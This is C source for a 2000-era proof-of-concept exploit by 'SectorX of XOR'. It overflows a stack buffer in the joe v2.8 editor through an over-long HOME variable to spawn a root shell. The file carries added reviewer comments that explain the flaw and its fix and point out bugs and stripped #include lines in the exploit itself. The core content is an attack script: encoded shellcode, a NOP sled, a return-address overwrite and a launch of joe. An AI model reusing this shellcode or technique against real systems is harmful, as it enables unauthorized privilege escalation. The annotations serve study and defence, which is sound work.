/* joe v2.8 stack overflow by SectorX of XOR (http://xorteam.cjb.net)
   joe overflows when trying to open() $HOME/.joerc, this is simply a
   proof of concept, hopefully to get the bug fixed. will attempt to
   spawn a rootshell.
   --sectorx http://xorteam.cjb.net */

/*
 * Reviewer notes (defensive reading of this proof of concept):
 *
 * - The defect being demonstrated is in the target, not in this file:
 *   per the author's comment, joe builds a path from the HOME
 *   environment variable in order to open $HOME/.joerc, and an
 *   over-long HOME value overruns a stack buffer there. joe's own code
 *   is not on this page, so the exact copy/format call at fault cannot
 *   be identified from here. The fix on the joe side is a bounded path
 *   build (snprintf() into the fixed buffer with a check of the returned
 *   length) or rejecting HOME values longer than the buffer allows.
 * - Environment variables are untrusted input to any program that runs
 *   with more privilege than its caller; "rootshell" in the header
 *   presumes joe is installed setuid root, which this page does not show.
 * - The code is 32-bit x86 only (%esp/%eax in get_sp(), a 4-byte
 *   address write in main()) and predates stack protectors,
 *   non-executable stacks and ASLR, each of which defeats the fixed
 *   return-address guess this file depends on.
 * - The three #include lines appear to have lost their header names in
 *   extraction (angle brackets stripped); the file does not compile as
 *   shown.
 */
#include
#include
#include

#define NOP 0x90     /* x86 one-byte nop; the buffer is pre-filled with it */
#define BSIZE 1032   /* size in bytes of the HOME value handed to joe */

/* Opaque machine-code payload copied near the end of the buffer in
   main(). The author's header says it attempts to spawn a shell; the
   bytes are not analysed here. */
char shellcode[] =
"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
"\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
"\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
"\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
"\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
"\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
"\xc2\x91";

/* Returns the current stack pointer of this process.
   Non-void function with no return statement: it relies on the inline
   asm having left %esp in %eax, the integer return register of the
   32-bit x86 ABI. Strictly that is undefined behaviour in C, and the
   asm will not assemble on x86-64 (no %esp/%eax stack register). */
long get_sp()
{
    __asm__("mov %esp, %eax");
}

/* Builds an oversized HOME value and launches joe with it.
   argv[1], if present, is parsed with atoi() (no validation) as the
   offset added to get_sp()'s value to form the address stored in the
   last four bytes of the buffer; the default is 0x5dc.

   Defects in this file itself, as distinct from the bug it targets:
   - buffer[BSIZE] = '\0' writes one byte past the end of buffer (valid
     indices are 0..BSIZE-1): the PoC has its own stack overflow, and
     buffer is not guaranteed NUL-terminated within its bounds when
     setenv() reads it.
   - *(long*)&buffer[BSIZE-4] assumes sizeof(long) == 4; on LP64 it
     writes four bytes past the array, and the cast accesses a char
     array as a long (alignment and strict-aliasing UB).
   - The second %x in the printf() format receives a long; the
     specifier does not match the argument type (%lx would).
   - main falls off the end without a return; C99 treats that as
     return 0 for main, C89 does not.
   - system("joe") resolves joe through PATH and runs it via /bin/sh;
     both inherit the modified environment. */
int main(int argc, char *argv[])
{
    char buffer[BSIZE];
    int offset;
    long stack = get_sp();   /* base for the guessed return address */

    fprintf(stderr,"joe stack overflow by SectorX of XOR\n");
    fprintf(stderr,"* offsets can be supplied as a parameter.\n\n");

    offset = 0x5dc;                           /* default; override below is unchecked */
    if (argc > 1) offset = atoi(argv[1]);

    memset(&buffer,NOP,BSIZE);                /* whole buffer pre-filled with nop */
    /* payload ends 5 bytes before the end of buffer; the final 4 bytes
       are overwritten with the address just below */
    memcpy(buffer+BSIZE-strlen(shellcode)-5,shellcode,strlen(shellcode));
    // last 4 bytes overwrites %eip
    *(long*)&buffer[BSIZE-4] = stack+offset;  /* 4 bytes only when sizeof(long) == 4 (see notes above) */
    buffer[BSIZE] = '\0';                     /* BUG: one past the end of buffer (see notes above) */
    printf("Using offset 0x%x, return address set to 0x%x\n",offset,stack+offset);  /* second %x is given a long */
    setenv("HOME",buffer,1);                  /* the oversized HOME is the input joe mishandles */
    system("joe");                            /* runs via /bin/sh with the modified environment */
}
/* www.hack.co.za [8 June 2000]*/